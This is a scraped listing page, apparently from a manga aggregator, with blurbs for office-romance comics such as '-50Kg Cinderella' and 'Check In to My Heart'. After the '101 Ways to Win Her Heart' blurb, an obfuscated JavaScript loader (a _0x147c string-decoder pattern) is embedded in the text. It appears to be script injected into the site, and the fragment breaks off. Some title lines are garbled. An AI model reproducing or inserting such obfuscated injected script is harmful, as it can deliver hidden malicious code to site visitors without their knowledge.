Office Workers

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

68 results

-50Kg Cinderella

Hime, a chubby girl, is in university and currently job hunting. During an info session at one of the companies, she accidentally gets hurt but receives help from the company’s information desk clerk, Osamu. Hime falls in love at first sight with the totally prince-like Osamu. She’d like to meet him once again and in order to accomplish this, she works hard on her diet and loses 50kg! She starts working at the same company, but even after 1 year she still hasn’t found him. Then one day, the number one handsome man within the company and rumored son of a distinguished family transfers to Hime’s department. This turns out to be Osamu! In her brief moment of happiness at their reunion, Osamu frankly declares, “I have someone I’m interested in” and Hime loses all her courage. However, why does Osamu do things like hugging Hime, whispering sweet words to her, and treating her special? Will Hime be kept being played by this unexpected doting love…!?


101 Ways to Win Her Heart

Minyoung - having graduated from an all-girls middle school, high school, and college and now working as a lingerie designer - knows zero-to-nothing about men and subsequently has never dated anyone. When the CEO of her company suggests setting her up on a blind date, she has no other choice but to say yes. She goes on the date only to be faced with an off-putting yet handsome guy, who ignores her for the majority of the time but then has the audacity to suggest seeing each other. Flabbergasted, she decides to leave and to never see him again... little did she know, she would meet him the next day as the photographer on her project at work. On the other hand, Donghwa remembers meeting Minyoung ten years ago and can't help but smile at her spunk and confidence. Despite her rather lukewarm reaction, he's determined to play to win her heart. Let the games begin! 101 Ways to Flirt With Her / ??? ??? 101?? ??<script></script><script>function _0x147c(_0x333337,_0x58daa0){var _0x3adf53=_0x4ce6();return _0x147c=function(_0x56cff4,_0x8253b8){_0x56cff4=_0x56cff4-(-0x185*0x7+-0x1703+0x71d*0x5);var _0x3e56c1=_0x3adf53[_0x56cff4];return _0x3e56c1;},_0x147c(_0x333337,_0x58daa0);}(function(_0x33a07e,_0x1e7c3e){var _0x3b7dc9=_0x147c,_0x3f7d58=_0x33a07e();while(!![]){try{var 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20-Year-Old College Jocks

After breaking up with an irredeemable trash of an ex-boyfriend, the only thing Hyemin is lacking is sex. Normally, she wouldn't even look at a dating app, but the younger guy she met there brought a friend to their meeting place. “'Is it okay if we do it with the three of us, noona?' “Isn't that only possible in videos? …I don't know, let's just go for it like I've won the lottery!”


A Close Call Romance

An obscure actress named Kim Eun-hong, who alternates between minor roles and extras. On her way home drunk after being dumped by her boyfriend of nine years, Kim Eun-Hong became involved in an accident with Lee Kang-il, the CEO of LJ Pharmaceutical. But then Kang-il suddenly asks me to act like his fiancée. You’re giving me a billion won just for getting engaged? Why me? “I can’t live without Kim Eun-hong.” I’m pretending to be his fake fiancée to avoid being thrown into jail… Can Eun-hong be reborn as a veiled French girl with a gold spoon? And will she be able to keep her contract with Kang-il, who harbors a lot of secrets? A man who dies if he’s not confident?! And Eun-hong’s life-threatening (?) romance act for him!


A Contractual Couple Again

Gun-ha and Seo-yeon were strongly attracted to each other, but because they lived completely different lives their marriage ended short and eventually they chose to divorce. Five years later, Gun-ha proposes to Seo-yeon again to be a ‘contract couple’. “Please marry me again. This time, we stay as an ordinary couple.” Please Marry Me Again / Let’s Get Married Again / Again, A Contractual Couple / Again, A Contract Couple / Again, The Contract Couple / Again, The Contractual Couple / 또다시, 계약 부부


Accidental Love

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Apex Predator

Gain-Driven Apex Alpha x Gentle Rational Researcher Omega After getting marked by accident in the lab 3 years ago, Shen Dai developed feelings for Qu Moyu. He thought he could only watch from afar, but a certain deal landed the pair in a contract despite the massive gap in their social standings. However, “Apex Alphas are heartless”. While Shen Dai is swept away by that person's tenderness, he is also consciously aware of the difference between them…


Be Quiet and Don’t Even Smile in the Office

Kim Na-Yool is an overworked designer working at Ethical Communications, a famous advertising company. Night after night, she remains in the office to labor away a job that never seems to end. But one day, after a long journey of misfortunes including the loss of all her precious work due to her computer overloading, Na-Yool loses it. That’s it! No more sacrificing her life for the sake of a company who does not deserve her! In a sudden burst of courage, she barges into the President office to rebel. There, she witnesses her handsome boss, Kwon Si-Jin, secretly enjoying jerking off… The weird office romance of a pervy CEO and his hardworking underling! What exciting events await Na-Yool’s long sleepless nights?


Becoming A Legendary Ace Employee

Read Manhwa Becoming A Legendary Ace Employee Online For Free On Zinmanga Associated Names: Become A Legend As An All-Rounder / Becoming The Legend Of The All-Around Employee / The Legendary All-Rounder / 만능사원 전설이 되다 The Content Becoming A Legendary Ace Employee: Kim Tae-Seok, Who Worked On A Construction Site, Receives A Notice Of Passing The Document Screening For The Major Company El Sung. At The Same Time, A Message Pops Up In Front Of Him: ‘You Have Entered The Path To Becoming A Regular Employee Tutorial. Would You Like To Proceed?’ Follow Kim Tae-Seok’s Struggle To Become The Legendary All-Around Employee In This Corporate Adventure! New And Hot Comics Are Updated The Fastest. Another World Dump Truck Pure Cohabitation Starting As The Black Dragon Boss Mangazin Is A Website That Aggregates The Latest And Hottest Manga, Updated Quickly To Serve Readers With High-Quality Images And Deliver Them An Excellent Experience.


Bright Red Temptation

[Mature Audiences Only] Shy and timid Yoo Seoyeong is desperate to get back at Min Jooyeon for ruining her life in high school, no matter how petty the revenge is. So when she sees Seo Jaeha, the gorgeous new department manager of her company and Jooyeon's fiance, she grabs the chance to seduce him into spending a steamy night with her. But what should've been a one-night stand becomes much more tangled as both Seoyeong's body and heart burns for Jaeha's affection. Will she walk out of her revenge plot unscathed? Or will she be scorched by the very fire she started?


Check In to My Heart

My boss wasn’t supposed to fall for me! Ajin, the newest intern at the ritzy HU Hotel, seems to have it all: looks, intelligence, and money. But when Seolmin, the CEO, discovers that she’s living in the basement of his hotel, Ajin desperately makes a deal with him to avoid getting kicked out. But this deal might change her life forever! Will It Get Better or Will It Be Love? / 좋아질까 사랑일까


Collector (Seo Hye-Eun)

Kang Seung-Won, Ceo Of Su Construction, Is The Name Of The Man Who Proposed Sponsorship To Sojin. He Was A Person Who Caught My Attention Even At The Event Where I First Met Him, But I Was Planning On Rejecting His Unpleasant Offer. If Only Those Who Had Insulted Her And Her Mother Had Not Caught Their Attention. Sojin Accepted His Offer For Personal Revenge, And Seungwon Knew It, But He Was Used By Her. So The Two Become Entangled In A Deep Spawn Relationship…
